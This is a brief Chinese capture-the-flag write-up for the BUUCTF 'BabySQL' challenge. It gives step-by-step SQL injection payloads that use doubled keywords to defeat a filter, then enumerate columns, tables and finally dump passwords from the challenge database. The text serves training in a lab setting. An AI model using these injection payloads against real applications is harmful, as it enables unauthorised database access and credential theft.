buuctf [极客大挑战 2019]BabySQL
单引号测试报错
万能密码1’ or 1=1#
1’ or 1=1# 报错
想到可能是存在过滤,
双写or,使or过滤后重组为or
1’ oorr 1=1#order by查字段
1’ oorrder bbyy 3# 页面正常
1’ oorrder bbyy 4# 报错
爆库名
1' ununionion selselectect 1,2,database()#
表
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infofromrmation_schema.tables whwhereere table_schema=database()#
列
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infofromrmation_schema.columns whwhereere table_name='b4bsql'#
爆password
1' ununionion selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#
注入时要求将过滤的字符全部双写